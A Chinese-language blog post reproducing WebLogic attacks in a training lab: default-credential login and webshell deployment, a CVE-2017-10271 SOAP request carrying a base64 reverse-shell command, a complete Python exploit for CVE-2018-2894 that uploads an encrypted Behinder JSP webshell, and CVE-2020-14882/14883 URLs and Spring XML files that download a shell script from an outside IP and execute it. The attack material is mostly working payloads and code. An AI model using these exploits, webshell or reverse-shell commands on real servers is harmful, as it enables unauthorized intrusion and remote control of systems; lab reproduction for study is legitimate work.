weblogic漏洞复现

Weblogic-WeakPasswd

0x00

发现一个weblogic

image-20240208210927335

搜索weblogic后台,直接查看console

image-20240208211447184

然后发现这个,尝试默认的密码

https://cirt.net/passwords?criteria=weblogic

发现密码是

账号:weblogic 密码:Oracle@123

image-20240208212502261

0x01

部署jar包

image-20240208212912182

image-20240208212937258

image-20240208213136034

image-20240208213507459

image-20240208213532934

上传成功

0x02

连接蚁剑

image-20240208213717165

CVE-2017-10271

使用的是蚁景 的靶场,然后发现了弱口令…

image-20240208215503172

image-20240208215448841

0x00

发现了weblogic 然后进行扫描发现漏洞

image-20240208215846164

查看了10271 发现是一个

0x01

开启监听9999端口

0x02

尝试利用

抓一个包,修改成

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: http://target.yijinglab.com:58169/
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 668

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>
echo YmFzaCAtaSA+JiAvZGV2LcC84LjEzMC4xMjMuMjUvOTk5OSAYxIA==|base64 -d|bash -i</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

image-20240208222227441

利用成功

CVE-2018-2894

0x00

image-20240208234249671

还是一个Weblogic

0x01

直接利用CVE-2018-2894

使用exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
# Modify By mingy

import re
import sys
import time
import argparse
import requests
import traceback
import xml.etree.ElementTree as ET


def get_current_work_path(host):
    geturl = f"{host}/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    values = []
    try:
        request = requests.get(geturl)
        if request.status_code == 404:
            exit(f"[-] {host}  don't exists CVE-2018-2894")
        elif "Deploying Application".lower() in request.text.lower():
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            request = requests.get(geturl, headers=ua)
        if "</defaultValue>" in request.content.decode():
            root = ET.fromstring(request.content)
            value = root.find("section").find("options")
            for e in value:
                values.extend(
                    sub.text
                    for sub in e
                    if e.tag == "parameter" and sub.tag == "defaultValue"
                )
    except requests.ConnectionError:
        exit(f"[-] Cannot connect url: {geturl}")
    if values:
        return values[0]
    print("[-] Cannot get current work path\n")
    exit(request.content)


def get_new_work_path(host):
    origin_work_path = get_current_work_path(host)
    works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
    if "user_projects" in origin_work_path:
        if "\\" in origin_work_path:
            works = works.replace("/", "\\")
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
            dir_len = len(current_work_home.split("\\"))
            domain_name = origin_work_path.split("\\")[dir_len]
            current_work_home += "\\" + domain_name + works
        else:
            current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
            dir_len = len(current_work_home.split("/"))
            domain_name = origin_work_path.split("/")[dir_len]
            current_work_home += f"/{domain_name}{works}"
    else:
        current_work_home = origin_work_path
        print(f"[*] cannot handle current work home dir: {current_work_home}")
    return current_work_home


def set_new_upload_path(host, path):
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    request = requests.post(f"{host}/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in request.content.decode():
        return True
    print("[-] Change New Upload Path failed")
    exit(request.content)


def upload_webshell(host, uri):
    set_new_upload_path(host, get_new_work_path(host))
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": password,
        "ks_password_changed": "true",
        "ks_filename": ("test.jsp", upload_content)
    }

    request = requests.post(host + uri, files=files)
    response = request.text
    if match := re.findall("<id>(.*?)</id>", response):
        tid = match[-1]
        shell_path = f"{host}/ws_utc/css/config/keystore/{str(tid)}_test.jsp"
        if "test" in requests.get(shell_path, headers=headers).content.decode():
            print(f"[+] {host} exists CVE-2018-2894")
            print(f"[+] Check URL: {shell_path} ")
        else:
            print(f"[-] {host}  don't exists CVE-2018-2894")
    else:
        print(f"[-] {host}  don't exists CVE-2018-2894")


if __name__ == "__main__":
    start = time.time()
    password = "test"
    url = "/ws_utc/resources/setting/keystore"
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
                        help="target, such as: http://example.com:7001")

    # write into behinder default jsp webshell
    upload_content = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%><%out.println("test");%>'
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }

    if len(sys.argv) == 1:
        sys.argv.append('-h')
    args = parser.parse_args()
    target = args.target

    target = target.rstrip('/')
    if "://" not in target:
        target = f"http://{target}"
    try:
        upload_webshell(target, url)
    except Exception as e:
        print("[-] Error: \n")
        traceback.print_exc()

image-20240208234359536

使用冰蝎连接

密码是rebeyond

image-20240208234647328

CVE-2020-14882

这个漏洞需要联动CVE-2020-14883

CVE-2020-14882 是一个未授权访问漏洞

CVE-2020-14883 可以反弹shell

0x00

准备shell.sh文件

image-20240208235749993

然后开启http 监听服务

0x01

使用请求下载文件

1
http://target.yijinglab.com:50756/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec (‘curl http://8.130.123.25:8000/shell.sh -o /tmp/shell.sh’);”)

image-20240209000255712

下载成功

执行文件

1
http://target.yijinglab.com:50756/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('/bin/bash /tmp/shell.sh');")

执行成功

image-20240209000454392

反弹shell

0x02

还可以尝试使用xml 下载文件,因为weblogic 会解析xml

downdoal.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[curl 139.155.49.43:8000/shell.sh -o /tmp/shell.sh]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

runshell.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
   xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>bash</value>
            <value>-c</value>
            <value><![CDATA[bash /tmp/shell.sh]]></value>
          </list>
        </constructor-arg>
    </bean>
</beans>

下载文件

1
http://192.168.79.128:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(“http://8.130.123.25:8000/download.xml“)

image-20240209001047734

执行文件

1
http://target.yijinglab.com:50756/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://8.130.123.25:8000/runshell.xml")

image-20240209001157563

成功反弹shell

#整理
weblogic漏洞复现
https://tsy244.github.io/2024/02/08/整理/weblogic漏洞复现/
Author
August Rosenberg
Posted on
February 8, 2024
Licensed under